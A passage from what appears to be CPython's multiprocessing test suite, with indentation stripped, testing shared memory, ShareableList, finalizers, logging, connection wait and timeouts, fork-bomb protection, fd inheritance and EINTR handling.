for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, latin('hellohello'))
def test_synchronize(self):
self.test_sharedctypes(lock=True)
def test_copy(self):
foo = _Foo(2, 5.0, 2 ** 33)
bar = copy(foo)
foo.x = 0
foo.y = 0
foo.z = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
self.assertEqual(bar.z, 2 ** 33)
@unittest.skipUnless(HAS_SHMEM, "requires multiprocessing.shared_memory")
class _TestSharedMemory(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@staticmethod
def _attach_existing_shmem_then_write(shmem_name_or_obj, binary_data):
if isinstance(shmem_name_or_obj, str):
local_sms = shared_memory.SharedMemory(shmem_name_or_obj)
else:
local_sms = shmem_name_or_obj
local_sms.buf[:len(binary_data)] = binary_data
local_sms.close()
def test_shared_memory_basics(self):
sms = shared_memory.SharedMemory('test01_tsmb', create=True, size=512)
self.addCleanup(sms.unlink)
# Verify attributes are readable.
self.assertEqual(sms.name, 'test01_tsmb')
self.assertGreaterEqual(sms.size, 512)
self.assertGreaterEqual(len(sms.buf), sms.size)
# Modify contents of shared memory segment through memoryview.
sms.buf[0] = 42
self.assertEqual(sms.buf[0], 42)
# Attach to existing shared memory segment.
also_sms = shared_memory.SharedMemory('test01_tsmb')
self.assertEqual(also_sms.buf[0], 42)
also_sms.close()
# Attach to existing shared memory segment but specify a new size.
same_sms = shared_memory.SharedMemory('test01_tsmb', size=20*sms.size)
self.assertLess(same_sms.size, 20*sms.size) # Size was ignored.
same_sms.close()
# Creating Shared Memory Segment with -ve size
with self.assertRaises(ValueError):
shared_memory.SharedMemory(create=True, size=-2)
# Attaching Shared Memory Segment without a name
with self.assertRaises(ValueError):
shared_memory.SharedMemory(create=False)
# Test if shared memory segment is created properly,
# when _make_filename returns an existing shared memory segment name
with unittest.mock.patch(
'multiprocessing.shared_memory._make_filename') as mock_make_filename:
NAME_PREFIX = shared_memory._SHM_NAME_PREFIX
names = ['test01_fn', 'test02_fn']
# Prepend NAME_PREFIX which can be '/psm_' or 'wnsm_', necessary
# because some POSIX compliant systems require name to start with /
names = [NAME_PREFIX + name for name in names]
mock_make_filename.side_effect = names
shm1 = shared_memory.SharedMemory(create=True, size=1)
self.addCleanup(shm1.unlink)
self.assertEqual(shm1._name, names[0])
mock_make_filename.side_effect = names
shm2 = shared_memory.SharedMemory(create=True, size=1)
self.addCleanup(shm2.unlink)
self.assertEqual(shm2._name, names[1])
if shared_memory._USE_POSIX:
# Posix Shared Memory can only be unlinked once. Here we
# test an implementation detail that is not observed across
# all supported platforms (since WindowsNamedSharedMemory
# manages unlinking on its own and unlink() does nothing).
# True release of shared memory segment does not necessarily
# happen until process exits, depending on the OS platform.
with self.assertRaises(FileNotFoundError):
sms_uno = shared_memory.SharedMemory(
'test01_dblunlink',
create=True,
size=5000
)
try:
self.assertGreaterEqual(sms_uno.size, 5000)
sms_duo = shared_memory.SharedMemory('test01_dblunlink')
sms_duo.unlink() # First shm_unlink() call.
sms_duo.close()
sms_uno.close()
finally:
sms_uno.unlink() # A second shm_unlink() call is bad.
with self.assertRaises(FileExistsError):
# Attempting to create a new shared memory segment with a
# name that is already in use triggers an exception.
there_can_only_be_one_sms = shared_memory.SharedMemory(
'test01_tsmb',
create=True,
size=512
)
if shared_memory._USE_POSIX:
# Requesting creation of a shared memory segment with the option
# to attach to an existing segment, if that name is currently in
# use, should not trigger an exception.
# Note: Using a smaller size could possibly cause truncation of
# the existing segment but is OS platform dependent. In the
# case of MacOS/darwin, requesting a smaller size is disallowed.
class OptionalAttachSharedMemory(shared_memory.SharedMemory):
_flags = os.O_CREAT | os.O_RDWR
ok_if_exists_sms = OptionalAttachSharedMemory('test01_tsmb')
self.assertEqual(ok_if_exists_sms.size, sms.size)
ok_if_exists_sms.close()
# Attempting to attach to an existing shared memory segment when
# no segment exists with the supplied name triggers an exception.
with self.assertRaises(FileNotFoundError):
nonexisting_sms = shared_memory.SharedMemory('test01_notthere')
nonexisting_sms.unlink() # Error should occur on prior line.
sms.close()
def test_shared_memory_across_processes(self):
sms = shared_memory.SharedMemory('test02_tsmap', True, size=512)
self.addCleanup(sms.unlink)
# Verify remote attachment to existing block by name is working.
p = self.Process(
target=self._attach_existing_shmem_then_write,
args=(sms.name, b'howdy')
)
p.daemon = True
p.start()
p.join()
self.assertEqual(bytes(sms.buf[:5]), b'howdy')
# Verify pickling of SharedMemory instance also works.
p = self.Process(
target=self._attach_existing_shmem_then_write,
args=(sms, b'HELLO')
)
p.daemon = True
p.start()
p.join()
self.assertEqual(bytes(sms.buf[:5]), b'HELLO')
sms.close()
@unittest.skipIf(os.name != "posix", "not feasible in non-posix platforms")
def test_shared_memory_SharedMemoryServer_ignores_sigint(self):
# bpo-36368: protect SharedMemoryManager server process from
# KeyboardInterrupt signals.
smm = multiprocessing.managers.SharedMemoryManager()
smm.start()
# make sure the manager works properly at the beginning
sl = smm.ShareableList(range(10))
# the manager's server should ignore KeyboardInterrupt signals, and
# maintain its connection with the current process, and success when
# asked to deliver memory segments.
os.kill(smm._process.pid, signal.SIGINT)
sl2 = smm.ShareableList(range(10))
# test that the custom signal handler registered in the Manager does
# not affect signal handling in the parent process.
with self.assertRaises(KeyboardInterrupt):
os.kill(os.getpid(), signal.SIGINT)
smm.shutdown()
@unittest.skipIf(os.name != "posix", "resource_tracker is posix only")
def test_shared_memory_SharedMemoryManager_reuses_resource_tracker(self):
# bpo-36867: test that a SharedMemoryManager uses the
# same resource_tracker process as its parent.
cmd = '''if 1:
from multiprocessing.managers import SharedMemoryManager
smm = SharedMemoryManager()
smm.start()
sl = smm.ShareableList(range(10))
smm.shutdown()
'''
rc, out, err = test.support.script_helper.assert_python_ok('-c', cmd)
# Before bpo-36867 was fixed, a SharedMemoryManager not using the same
# resource_tracker process as its parent would make the parent's
# tracker complain about sl being leaked even though smm.shutdown()
# properly released sl.
self.assertFalse(err)
def test_shared_memory_SharedMemoryManager_basics(self):
smm1 = multiprocessing.managers.SharedMemoryManager()
with self.assertRaises(ValueError):
smm1.SharedMemory(size=9) # Fails if SharedMemoryServer not started
smm1.start()
lol = [ smm1.ShareableList(range(i)) for i in range(5, 10) ]
lom = [ smm1.SharedMemory(size=j) for j in range(32, 128, 16) ]
doppleganger_list0 = shared_memory.ShareableList(name=lol[0].shm.name)
self.assertEqual(len(doppleganger_list0), 5)
doppleganger_shm0 = shared_memory.SharedMemory(name=lom[0].name)
self.assertGreaterEqual(len(doppleganger_shm0.buf), 32)
held_name = lom[0].name
smm1.shutdown()
if sys.platform != "win32":
# Calls to unlink() have no effect on Windows platform; shared
# memory will only be released once final process exits.
with self.assertRaises(FileNotFoundError):
# No longer there to be attached to again.
absent_shm = shared_memory.SharedMemory(name=held_name)
with multiprocessing.managers.SharedMemoryManager() as smm2:
sl = smm2.ShareableList("howdy")
shm = smm2.SharedMemory(size=128)
held_name = sl.shm.name
if sys.platform != "win32":
with self.assertRaises(FileNotFoundError):
# No longer there to be attached to again.
absent_sl = shared_memory.ShareableList(name=held_name)
def test_shared_memory_ShareableList_basics(self):
sl = shared_memory.ShareableList(
['howdy', b'HoWdY', -273.154, 100, None, True, 42]
)
self.addCleanup(sl.shm.unlink)
# Verify attributes are readable.
self.assertEqual(sl.format, '8s8sdqxxxxxx?xxxxxxxx?q')
# Exercise len().
self.assertEqual(len(sl), 7)
# Exercise index().
with warnings.catch_warnings():
# Suppress BytesWarning when comparing against b'HoWdY'.
warnings.simplefilter('ignore')
with self.assertRaises(ValueError):
sl.index('100')
self.assertEqual(sl.index(100), 3)
# Exercise retrieving individual values.
self.assertEqual(sl[0], 'howdy')
self.assertEqual(sl[-2], True)
# Exercise iterability.
self.assertEqual(
tuple(sl),
('howdy', b'HoWdY', -273.154, 100, None, True, 42)
)
# Exercise modifying individual values.
sl[3] = 42
self.assertEqual(sl[3], 42)
sl[4] = 'some' # Change type at a given position.
self.assertEqual(sl[4], 'some')
self.assertEqual(sl.format, '8s8sdq8sxxxxxxx?q')
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[4] = 'far too many'
self.assertEqual(sl[4], 'some')
sl[0] = 'encodés' # Exactly 8 bytes of UTF-8 data
self.assertEqual(sl[0], 'encodés')
self.assertEqual(sl[1], b'HoWdY') # no spillage
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[0] = 'encodées' # Exactly 9 bytes of UTF-8 data
self.assertEqual(sl[1], b'HoWdY')
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[1] = b'123456789'
self.assertEqual(sl[1], b'HoWdY')
# Exercise count().
with warnings.catch_warnings():
# Suppress BytesWarning when comparing against b'HoWdY'.
warnings.simplefilter('ignore')
self.assertEqual(sl.count(42), 2)
self.assertEqual(sl.count(b'HoWdY'), 1)
self.assertEqual(sl.count(b'adios'), 0)
# Exercise creating a duplicate.
sl_copy = shared_memory.ShareableList(sl, name='test03_duplicate')
try:
self.assertNotEqual(sl.shm.name, sl_copy.shm.name)
self.assertEqual('test03_duplicate', sl_copy.shm.name)
self.assertEqual(list(sl), list(sl_copy))
self.assertEqual(sl.format, sl_copy.format)
sl_copy[-1] = 77
self.assertEqual(sl_copy[-1], 77)
self.assertNotEqual(sl[-1], 77)
sl_copy.shm.close()
finally:
sl_copy.shm.unlink()
# Obtain a second handle on the same ShareableList.
sl_tethered = shared_memory.ShareableList(name=sl.shm.name)
self.assertEqual(sl.shm.name, sl_tethered.shm.name)
sl_tethered[-1] = 880
self.assertEqual(sl[-1], 880)
sl_tethered.shm.close()
sl.shm.close()
# Exercise creating an empty ShareableList.
empty_sl = shared_memory.ShareableList()
try:
self.assertEqual(len(empty_sl), 0)
self.assertEqual(empty_sl.format, '')
self.assertEqual(empty_sl.count('any'), 0)
with self.assertRaises(ValueError):
empty_sl.index(None)
empty_sl.shm.close()
finally:
empty_sl.shm.unlink()
def test_shared_memory_ShareableList_pickling(self):
sl = shared_memory.ShareableList(range(10))
self.addCleanup(sl.shm.unlink)
serialized_sl = pickle.dumps(sl)
deserialized_sl = pickle.loads(serialized_sl)
self.assertTrue(
isinstance(deserialized_sl, shared_memory.ShareableList)
)
self.assertTrue(deserialized_sl[-1], 9)
self.assertFalse(sl is deserialized_sl)
deserialized_sl[4] = "changed"
self.assertEqual(sl[4], "changed")
# Verify data is not being put into the pickled representation.
name = 'a' * len(sl.shm.name)
larger_sl = shared_memory.ShareableList(range(400))
self.addCleanup(larger_sl.shm.unlink)
serialized_larger_sl = pickle.dumps(larger_sl)
self.assertTrue(len(serialized_sl) == len(serialized_larger_sl))
larger_sl.shm.close()
deserialized_sl.shm.close()
sl.shm.close()
def test_shared_memory_cleaned_after_process_termination(self):
cmd = '''if 1:
import os, time, sys
from multiprocessing import shared_memory
# Create a shared_memory segment, and send the segment name
sm = shared_memory.SharedMemory(create=True, size=10)
sys.stdout.write(sm.name + '\\n')
sys.stdout.flush()
time.sleep(100)
'''
with subprocess.Popen([sys.executable, '-E', '-c', cmd],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as p:
name = p.stdout.readline().strip().decode()
# killing abruptly processes holding reference to a shared memory
# segment should not leak the given memory segment.
p.terminate()
p.wait()
deadline = time.monotonic() + support.LONG_TIMEOUT
t = 0.1
while time.monotonic() < deadline:
time.sleep(t)
t = min(t*2, 5)
try:
smm = shared_memory.SharedMemory(name, create=False)
except FileNotFoundError:
break
else:
raise AssertionError("A SharedMemory segment was leaked after"
" a process was abruptly terminated.")
if os.name == 'posix':
# A warning was emitted by the subprocess' own
# resource_tracker (on Windows, shared memory segments
# are released automatically by the OS).
err = p.stderr.read().decode()
self.assertIn(
"resource_tracker: There appear to be 1 leaked "
"shared_memory objects to clean up at shutdown", err)
#
#
#
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
self.registry_backup = util._finalizer_registry.copy()
util._finalizer_registry.clear()
def tearDown(self):
self.assertFalse(util._finalizer_registry)
util._finalizer_registry.update(self.registry_backup)
@classmethod
def _test_finalize(cls, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
# call multiprocessing's cleanup function then exit process without
# garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.daemon = True
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
def test_thread_safety(self):
# bpo-24484: _run_finalizers() should be thread-safe
def cb():
pass
class Foo(object):
def __init__(self):
self.ref = self # create reference cycle
# insert finalizer at random key
util.Finalize(self, cb, exitpriority=random.randint(1, 100))
finish = False
exc = None
def run_finalizers():
nonlocal exc
while not finish:
time.sleep(random.random() * 1e-1)
try:
# A GC run will eventually happen during this,
# collecting stale Foo's and mutating the registry
util._run_finalizers()
except Exception as e:
exc = e
def make_finalizers():
nonlocal exc
d = {}
while not finish:
try:
# Old Foo's get gradually replaced and later
# collected by the GC (because of the cyclic ref)
d[random.getrandbits(5)] = {Foo() for i in range(10)}
except Exception as e:
exc = e
d.clear()
old_interval = sys.getswitchinterval()
old_threshold = gc.get_threshold()
try:
sys.setswitchinterval(1e-6)
gc.set_threshold(5, 5, 5)
threads = [threading.Thread(target=run_finalizers),
threading.Thread(target=make_finalizers)]
with test.support.start_threads(threads):
time.sleep(4.0) # Wait a bit to trigger race condition
finish = True
if exc is not None:
raise exc
finally:
sys.setswitchinterval(old_interval)
gc.set_threshold(*old_threshold)
gc.collect() # Collect remaining Foo's
#
# Test that from ... import * works for each module
#
class _TestImportStar(unittest.TestCase):
def get_module_names(self):
import glob
folder = os.path.dirname(multiprocessing.__file__)
pattern = os.path.join(folder, '*.py')
files = glob.glob(pattern)
modules = [os.path.splitext(os.path.split(f)[1])[0] for f in files]
modules = ['multiprocessing.' + m for m in modules]
modules.remove('multiprocessing.__init__')
modules.append('multiprocessing')
return modules
def test_import(self):
modules = self.get_module_names()
if sys.platform == 'win32':
modules.remove('multiprocessing.popen_fork')
modules.remove('multiprocessing.popen_forkserver')
modules.remove('multiprocessing.popen_spawn_posix')
else:
modules.remove('multiprocessing.popen_spawn_win32')
if not HAS_REDUCTION:
modules.remove('multiprocessing.popen_forkserver')
if c_int is None:
# This module requires _ctypes
modules.remove('multiprocessing.sharedctypes')
for name in modules:
__import__(name)
mod = sys.modules[name]
self.assertTrue(hasattr(mod, '__all__'), name)
for attr in mod.__all__:
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = multiprocessing.get_logger()
logger.setLevel(util.SUBWARNING)
self.assertTrue(logger is not None)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
@classmethod
def _test_level(cls, conn):
logger = multiprocessing.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = multiprocessing.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = multiprocessing.Pipe(duplex=False)
logger.setLevel(LEVEL1)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL1, reader.recv())
p.join()
p.close()
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL2, reader.recv())
p.join()
p.close()
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == multiprocessing.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'multiprocessing.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Check that Process.join() retries if os.waitpid() fails with EINTR
#
class _TestPollEintr(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _killer(cls, pid):
time.sleep(0.1)
os.kill(pid, signal.SIGUSR1)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_poll_eintr(self):
got_signal = [False]
def record(*args):
got_signal[0] = True
pid = os.getpid()
oldhandler = signal.signal(signal.SIGUSR1, record)
try:
killer = self.Process(target=self._killer, args=(pid,))
killer.start()
try:
p = self.Process(target=time.sleep, args=(2,))
p.start()
p.join()
finally:
killer.join()
self.assertTrue(got_signal[0])
self.assertEqual(p.exitcode, 0)
finally:
signal.signal(signal.SIGUSR1, oldhandler)
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_handles(self):
conn = multiprocessing.connection.Connection(44977608)
# check that poll() doesn't crash
try:
conn.poll()
except (ValueError, OSError):
pass
finally:
# Hack private attribute _handle to avoid printing an error
# in conn.__del__
conn._handle = None
self.assertRaises((ValueError, OSError),
multiprocessing.connection.Connection, -1)
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return b'something bogus'
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.deliver_challenge,
_FakeConnection(), b'abc')
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return multiprocessing.connection.CHALLENGE
elif self.count == 2:
return b'something bogus'
return b''
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.answer_challenge,
_FakeConnection(), b'abc')
#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#
def initializer(ns):
ns.test += 1
class TestInitializers(unittest.TestCase):
def setUp(self):
self.mgr = multiprocessing.Manager()
self.ns = self.mgr.Namespace()
self.ns.test = 0
def tearDown(self):
self.mgr.shutdown()
self.mgr.join()
def test_manager_initializer(self):
m = multiprocessing.managers.SyncManager()
self.assertRaises(TypeError, m.start, 1)
m.start(initializer, (self.ns,))
self.assertEqual(self.ns.test, 1)
m.shutdown()
m.join()
def test_pool_initializer(self):
self.assertRaises(TypeError, multiprocessing.Pool, initializer=1)
p = multiprocessing.Pool(1, initializer, (self.ns,))
p.close()
p.join()
self.assertEqual(self.ns.test, 1)
#
# Issue 5155, 5313, 5331: Test process in processes
# Verifies os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior
#
def _this_sub_process(q):
try:
item = q.get(block=False)
except pyqueue.Empty:
pass
def _test_process():
queue = multiprocessing.Queue()
subProc = multiprocessing.Process(target=_this_sub_process, args=(queue,))
subProc.daemon = True
subProc.start()
subProc.join()
def _afunc(x):
return x*x
def pool_in_process():
pool = multiprocessing.Pool(processes=4)
x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
pool.close()
pool.join()
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
# There are no race conditions since fork keeps only the running thread
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
def test_queue_in_process(self):
proc = multiprocessing.Process(target=_test_process)
proc.start()
proc.join()
def test_pool_in_process(self):
p = multiprocessing.Process(target=pool_in_process)
p.start()
p.join()
def test_flushing(self):
sio = io.StringIO()
flike = _file_like(sio)
flike.write('foo')
proc = multiprocessing.Process(target=lambda: flike.flush())
flike.flush()
assert sio.getvalue() == 'foo'
class TestWait(unittest.TestCase):
@classmethod
def _child_test_wait(cls, w, slow):
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
w.send((i, os.getpid()))
w.close()
def test_wait(self, slow=False):
from multiprocessing.connection import wait
readers = []
procs = []
messages = []
for i in range(4):
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._child_test_wait, args=(w, slow))
p.daemon = True
p.start()
w.close()
readers.append(r)
procs.append(p)
self.addCleanup(p.join)
while readers:
for r in wait(readers):
try:
msg = r.recv()
except EOFError:
readers.remove(r)
r.close()
else:
messages.append(msg)
messages.sort()
expected = sorted((i, p.pid) for i in range(10) for p in procs)
self.assertEqual(messages, expected)
@classmethod
def _child_test_wait_socket(cls, address, slow):
s = socket.socket()
s.connect(address)
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
s.sendall(('%s\n' % i).encode('ascii'))
s.close()
def test_wait_socket(self, slow=False):
from multiprocessing.connection import wait
l = socket.create_server((test.support.HOST, 0))
addr = l.getsockname()
readers = []
procs = []
dic = {}
for i in range(4):
p = multiprocessing.Process(target=self._child_test_wait_socket,
args=(addr, slow))
p.daemon = True
p.start()
procs.append(p)
self.addCleanup(p.join)
for i in range(4):
r, _ = l.accept()
readers.append(r)
dic[r] = []
l.close()
while readers:
for r in wait(readers):
msg = r.recv(32)
if not msg:
readers.remove(r)
r.close()
else:
dic[r].append(msg)
expected = ''.join('%s\n' % i for i in range(10)).encode('ascii')
for v in dic.values():
self.assertEqual(b''.join(v), expected)
def test_wait_slow(self):
self.test_wait(True)
def test_wait_socket_slow(self):
self.test_wait_socket(True)
def test_wait_timeout(self):
from multiprocessing.connection import wait
expected = 5
a, b = multiprocessing.Pipe()
start = time.monotonic()
res = wait([a, b], expected)
delta = time.monotonic() - start
self.assertEqual(res, [])
self.assertLess(delta, expected * 2)
self.assertGreater(delta, expected * 0.5)
b.send(None)
start = time.monotonic()
res = wait([a, b], 20)
delta = time.monotonic() - start
self.assertEqual(res, [a])
self.assertLess(delta, 0.4)
@classmethod
def signal_and_sleep(cls, sem, period):
sem.release()
time.sleep(period)
def test_wait_integer(self):
from multiprocessing.connection import wait
expected = 3
sorted_ = lambda l: sorted(l, key=lambda x: id(x))
sem = multiprocessing.Semaphore(0)
a, b = multiprocessing.Pipe()
p = multiprocessing.Process(target=self.signal_and_sleep,
args=(sem, expected))
p.start()
self.assertIsInstance(p.sentinel, int)
self.assertTrue(sem.acquire(timeout=20))
start = time.monotonic()
res = wait([a, p.sentinel, b], expected + 20)
delta = time.monotonic() - start
self.assertEqual(res, [p.sentinel])
self.assertLess(delta, expected + 2)
self.assertGreater(delta, expected - 2)
a.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([p.sentinel, b]))
self.assertLess(delta, 0.4)
b.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([a, p.sentinel, b]))
self.assertLess(delta, 0.4)
p.terminate()
p.join()
def test_neg_timeout(self):
from multiprocessing.connection import wait
a, b = multiprocessing.Pipe()
t = time.monotonic()
res = wait([a], timeout=-1)
t = time.monotonic() - t
self.assertEqual(res, [])
self.assertLess(t, 1)
a.close()
b.close()
#
# Issue 14151: Test invalid family on invalid environment
#
class TestInvalidFamily(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_family(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener(r'\\.\test')
@unittest.skipUnless(WIN32, "skipped on non-Windows platforms")
def test_invalid_family_win32(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener('/var/test.pipe')
#
# Issue 12098: check sys.flags of child matches that for parent
#
class TestFlags(unittest.TestCase):
@classmethod
def run_in_grandchild(cls, conn):
conn.send(tuple(sys.flags))
@classmethod
def run_in_child(cls):
import json
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=cls.run_in_grandchild, args=(w,))
p.start()
grandchild_flags = r.recv()
p.join()
r.close()
w.close()
flags = (tuple(sys.flags), grandchild_flags)
print(json.dumps(flags))
def test_flags(self):
import json
# start child process using unusual flags
prog = ('from test._test_multiprocessing import TestFlags; ' +
'TestFlags.run_in_child()')
data = subprocess.check_output(
[sys.executable, '-E', '-S', '-O', '-c', prog])
child_flags, grandchild_flags = json.loads(data.decode('ascii'))
self.assertEqual(child_flags, grandchild_flags)
#
# Test interaction with socket timeouts - see Issue #6056
#
class TestTimeouts(unittest.TestCase):
@classmethod
def _test_timeout(cls, child, address):
time.sleep(1)
child.send(123)
child.close()
conn = multiprocessing.connection.Client(address)
conn.send(456)
conn.close()
def test_timeout(self):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(0.1)
parent, child = multiprocessing.Pipe(duplex=True)
l = multiprocessing.connection.Listener(family='AF_INET')
p = multiprocessing.Process(target=self._test_timeout,
args=(child, l.address))
p.start()
child.close()
self.assertEqual(parent.recv(), 123)
parent.close()
conn = l.accept()
self.assertEqual(conn.recv(), 456)
conn.close()
l.close()
join_process(p)
finally:
socket.setdefaulttimeout(old_timeout)
#
# Test what happens with no "if __name__ == '__main__'"
#
class TestNoForkBomb(unittest.TestCase):
def test_noforkbomb(self):
sm = multiprocessing.get_start_method()
name = os.path.join(os.path.dirname(__file__), 'mp_fork_bomb.py')
if sm != 'fork':
rc, out, err = test.support.script_helper.assert_python_failure(name, sm)
self.assertEqual(out, b'')
self.assertIn(b'RuntimeError', err)
else:
rc, out, err = test.support.script_helper.assert_python_ok(name, sm)
self.assertEqual(out.rstrip(), b'123')
self.assertEqual(err, b'')
#
# Issue #17555: ForkAwareThreadLock
#
class TestForkAwareThreadLock(unittest.TestCase):
# We recursively start processes. Issue #17555 meant that the
# after fork registry would get duplicate entries for the same
# lock. The size of the registry at generation n was ~2**n.
@classmethod
def child(cls, n, conn):
if n > 1:
p = multiprocessing.Process(target=cls.child, args=(n-1, conn))
p.start()
conn.close()
join_process(p)
else:
conn.send(len(util._afterfork_registry))
conn.close()
def test_lock(self):
r, w = multiprocessing.Pipe(False)
l = util.ForkAwareThreadLock()
old_size = len(util._afterfork_registry)
p = multiprocessing.Process(target=self.child, args=(5, w))
p.start()
w.close()
new_size = r.recv()
join_process(p)
self.assertLessEqual(new_size, old_size)
#
# Check that non-forked child processes do not inherit unneeded fds/handles
#
class TestCloseFds(unittest.TestCase):
def get_high_socket_fd(self):
if WIN32:
# The child process will not have any socket handles, so
# calling socket.fromfd() should produce WSAENOTSOCK even
# if there is a handle of the same number.
return socket.socket().detach()
else:
# We want to produce a socket with an fd high enough that a
# freshly created child process will not have any fds as high.
fd = socket.socket().detach()
to_close = []
while fd < 50:
to_close.append(fd)
fd = os.dup(fd)
for x in to_close:
os.close(x)
return fd
def close(self, fd):
if WIN32:
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=fd).close()
else:
os.close(fd)
@classmethod
def _test_closefds(cls, conn, fd):
try:
s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
except Exception as e:
conn.send(e)
else:
s.close()
conn.send(None)
def test_closefd(self):
if not HAS_REDUCTION:
raise unittest.SkipTest('requires fd pickling')
reader, writer = multiprocessing.Pipe()
fd = self.get_high_socket_fd()
try:
p = multiprocessing.Process(target=self._test_closefds,
args=(writer, fd))
p.start()
writer.close()
e = reader.recv()
join_process(p)
finally:
self.close(fd)
writer.close()
reader.close()
if multiprocessing.get_start_method() == 'fork':
self.assertIs(e, None)
else:
WSAENOTSOCK = 10038
self.assertIsInstance(e, OSError)
self.assertTrue(e.errno == errno.EBADF or
e.winerror == WSAENOTSOCK, e)
#
# Issue #17097: EINTR should be ignored by recv(), send(), accept() etc
#
class TestIgnoreEINTR(unittest.TestCase):
# Sending CONN_MAX_SIZE bytes into a multiprocessing pipe must block
CONN_MAX_SIZE = max(support.PIPE_MAX_SIZE, support.SOCK_MAX_SIZE)
@classmethod
def _test_ignore(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
conn.send('ready')
x = conn.recv()
conn.send(x)
conn.send_bytes(b'x' * cls.CONN_MAX_SIZE)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
self.assertEqual(conn.recv(), 'ready')
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
conn.send(1234)
self.assertEqual(conn.recv(), 1234)
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
self.assertEqual(conn.recv_bytes(), b'x' * self.CONN_MAX_SIZE)
time.sleep(0.1)
p.join()
finally:
conn.close()
@classmethod
def _test_ignore_listener(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
with multiprocessing.connection.Listener() as l:
conn.send(l.address)
a = l.accept()
a.send('welcome')
